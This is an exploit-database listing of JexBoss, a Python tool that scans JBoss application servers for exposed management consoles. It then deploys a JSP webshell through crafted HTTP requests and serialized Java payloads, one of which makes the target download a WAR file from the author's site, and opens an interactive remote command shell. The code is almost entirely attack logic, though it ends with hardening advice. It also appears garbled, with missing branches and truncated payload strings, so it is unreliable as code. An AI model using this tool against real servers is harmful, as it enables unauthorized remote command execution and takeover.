JBoss AS versions 3/4/5/6 - Remote Command Execution Exploit

Author: João Filho Matos Figueiredo Published: 2015-04-14 Verified: Verified



# coding: utf-8
# JexBoss v1.0. @autor: João Filho Matos Figueiredo (joaomatosf@gmail.com)
# Updates: https://github.com/joaomatosf/jexboss
# Free for distribution and modification, but the authorship should be preserved.
import httplib, sys, urllib, os, time
from urllib import urlencode
RED = '\x1b[91m'
RED1 = '\033[31m'
BLUE = '\033[94m'
GREEN = '\033[32m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
ENDC = '\033[0m'
def getHost(url):
    tokens = url.split("://")
    if len(tokens) == 2: #foi fornecido protocolo
        return tokens[1].split(":")[0]
        return tokens.split(":")[0]
def getProtocol(url):
    tokens = url.split("://")
    if tokens[0] == "https":
        return "https"
        return "http"
def getPort(url):
    token = url[6:].split(":")
    if len(token) == 2:
        return token[1]
    elif getProtocol(url) == "https":
        return 443
        return 80
def getConnection(url):
    if getProtocol(url) == "https":
        return httplib.HTTPSConnection(getHost(url), getPort(url))
        return httplib.HTTPConnection(getHost(url), getPort(url))
def getSuccessfully(url, path):
        result = 404
        conn = getConnection(url)
        conn.request("GET", path)
        result = conn.getresponse().status
        if result == 404:
            conn = getConnection(url)
            conn.request("GET", path)
            result = conn.getresponse().status
        return result
def checkVul(url):
    print ( GREEN +" ** Checking Host: %s **\n" %url )
    path = { "jmx-console"       : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
             "web-console"       : "/web-console/ServerInfo.jsp",
             "JMXInvokerServlet" : "/invoker/JMXInvokerServlet"}
    for i in path.keys():
            print GREEN + " * Checking %s: \t" %i + ENDC,
            conn = getConnection(url)
            conn.request("HEAD", path[i])
            path[i] = conn.getresponse().status
            if path[i] == 200 or path[i] == 500:
                print RED + "[ VULNERABLE ]" + ENDC
            else: print GREEN + "[ OK ]"
            print RED + "\n * An error ocurred while contaction the host %s\n" %url + ENDC
            path[i] = 505
    return path
def autoExploit(url, type):
    # exploitJmxConsoleFileRepository: tested and working in jboss 4 and 5
    # exploitJmxConsoleMainDeploy:     tested and working in jboss 4 and 6
    # exploitWebConsoleInvoker:        tested and working in jboss 4
    # exploitJMXInvokerFileRepository: tested and working in jboss 4 and 5
    print GREEN + ("\n * Sending exploit code to %s. Wait...\n" %url)
    result = 505
    if type == "jmx-console":
        result = exploitJmxConsoleFileRepository(url)
        if result != 200 and result != 500:
            result = exploitJmxConsoleMainDeploy(url)
    elif type == "web-console":
        result = exploitWebConsoleInvoker(url)
    elif type == "JMXInvokerServlet":
        result = exploitJMXInvokerFileRepository(url)
    if result == 200 or result == 500:
        print GREEN + " * Successfully deployed code! Starting command shell, wait...\n" + ENDC
        shell_http(url, type)
        print (RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n"
                    "   Waiting for 7 seconds...\n "+ ENDC)
def shell_http(url, type):
    if type == "jmx-console" or type == "web-console":
        path = '/jbossass/jbossass.jsp?'
    elif type == "JMXInvokerServlet":
        path = '/shellinvoker/shellinvoker.jsp?'
    conn = getConnection(url)
    conn.request("GET", path)
    resp = ""
    print " * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n"
    print RED+" * "+url+": \n"+ENDC
    headers = {"User-Agent" : "jexboss"}
    for cmd in ['uname -a', 'cat /etc/issue', 'id']:
        conn = getConnection(url)
        cmd = urlencode({"ppp": cmd})
        conn.request("GET", path+cmd, '', headers)
        resp += " "+conn.getresponse().read().split(">")[1]
    print resp,
    while 1:
        print BLUE + "[Type commands or \"exit\" to finish]"
        cmd=raw_input("Shell> "+ENDC)
        #print ENDC
        if cmd == "exit":
        conn = getConnection(url)
        cmd = urlencode({"ppp": cmd})
        conn.request("GET", path+cmd, '', headers)
        resp = conn.getresponse()
        if resp.status == 404:
            print RED+ " * Error contacting the commando shell. Try again later..."
        stdout = ""
            stdout = resp.read().split("pre>")[1]
            print RED+ " * Error contacting the commando shell. Try again later..."
        if stdout.count("An exception occurred processing JSP page") == 1:
            print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC
        else: print stdout,
def exploitJmxConsoleMainDeploy(url):
    # MainDeployer
    # does not work in jboss5 (bug in jboss5)
    # shell in link
    # /jmx-console/HtmlAdaptor
    jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
    payload =(  "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service"
    print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell "
                   "\n   available on: "+jsp +ENDC)
    conn = getConnection(url)
    conn.request("HEAD", payload)
    result = conn.getresponse().status
    return getSuccessfully(url, "/jbossass/jbossass.jsp")   
def exploitJmxConsoleFileRepository(url):
        # DeploymentFileRepository
        # tested and work in jboss4, 5.
        # doest not work in jboss6
        # shell jsp
        # /jmx-console/HtmlAdaptor
        jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61"
              "%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" )
        payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
        conn = getConnection(url)
        conn.request("HEAD", payload)
        result = conn.getresponse().status
        return getSuccessfully(url, "/jbossass/jbossass.jsp")
def exploitJMXInvokerFileRepository(url):
    # tested and work in jboss4, 5
    # MainDeploy, shell in data
    # /invoker/JMXInvokerServlet
    payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"
    conn = getConnection(url)
    headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
                "Accept"  : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
    conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers)
    response = conn.getresponse()
    result = response.status
    if result == 401:
        print "   Retrying..."
        conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers)
        response = conn.getresponse()
        result = response.status
    if response.read().count("Failed") > 0:
        result = 505
    return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp")
def exploitWebConsoleInvoker(url):
    # does not work in jboss5 (bug in jboss5)
    # MainDeploy, shell in link
    # /web-console/Invoker
    #jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
    #jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp)
    #jsp = "\\x" + jsp
    payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e"
    conn = getConnection(url)
    headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
                "Accept"  : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
    conn.request("POST", "/web-console/Invoker", payload, headers)
    response = conn.getresponse()
    result = response.status
    if result == 401:
        print "   Retrying..."
        conn.request("HEAD", "/web-console/Invoker", payload, headers)
        response = conn.getresponse()
        result = response.status
    return getSuccessfully(url, "/jbossass/jbossass.jsp")
def clear():
    if os.name == 'posix':
    elif os.name == ('ce', 'nt', 'dos'):
def checkArgs(args):
    if len(args) < 2 or args[1].count('.') < 1:
        return 1,"You must provide the host name or IP address you want to test."
    elif len(args[1].split('://')) == 1:
        return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1])
    elif args[1].count('http') == 1 and args[1].count('.') > 1:
        return 0, ""
        return 1, 'Parâmetro inválido'
def banner():
    print (RED1+"\n * --- JexBoss: Jboss verify and EXploitation Tool  --- *\n"
              " |                                                      |\n"
              " | @author:  João Filho Matos Figueiredo                |\n"
              " | @contact: joaomatosf@gmail.com                       |\n"
              " |                                                      |\n"
              " | @update: https://github.com/joaomatosf/jexboss       |\n"
              " #______________________________________________________#\n\n" )
# check python version
if sys.version_info[0] == 3:
    print (RED + "\n * Not compatible with version 3 of python.\n"
                  "   Please run it with version 2.7 or lower.\n\n"
            +BLUE+" * Example:\n"
                  "   python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC )
# check Args
status, message = checkArgs(sys.argv)
if status == 0:
    url = sys.argv[1]
elif status == 1:
    print RED + "\n * Error: %s" %message
    print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC
elif status == 2:
    url = ''.join(['http://',sys.argv[1]])
# check vulnerabilities
mapResult = checkVul(url)
# performs exploitation
for i in ["jmx-console", "web-console", "JMXInvokerServlet"]:
    if mapResult[i] == 200 or mapResult[i] == 500:
        print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n"
                      "   This operation will provide a simple command shell to execute commands on the server..\n"
                 +RED+"   Continue only if you have permission!" +ENDC)
        if raw_input("   yes/NO ? ").lower() == "yes":
            autoExploit(url, i)
# resume results
if mapResult.values().count(200) > 0:
    print RED+ " Results: potentially compromised server!" +ENDC
    print (GREEN+" * - - - - - - -  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n"
              " Recommendations: \n"
              " - Remove web consoles and services that are not used, eg:\n"
              "    $ rm web-console.war\n"
              "    $ rm http-invoker.sar\n"
              "    $ rm jmx-console.war\n"
              "    $ rm jmx-invoker-adaptor-server.sar\n"
              "    $ rm admin-console.war\n"
              " - Use a reverse proxy (eg. nginx, apache, f5)\n"
              " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"
              " - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n"
              " References:\n"
              "   [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"
              "   [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"
              " - If possible, discard this server!\n\n"
              " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" )
elif mapResult.values().count(505) == 0:
    print ( GREEN+ "\n\n * Results: \n"
            "   The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)
# infos 
print (ENDC+" * Info: review, suggestions, updates, etc: \n"
             "   https://github.com/joaomatosf/jexboss\n"
             "   joaomatosf@gmail.com\n")
print ENDC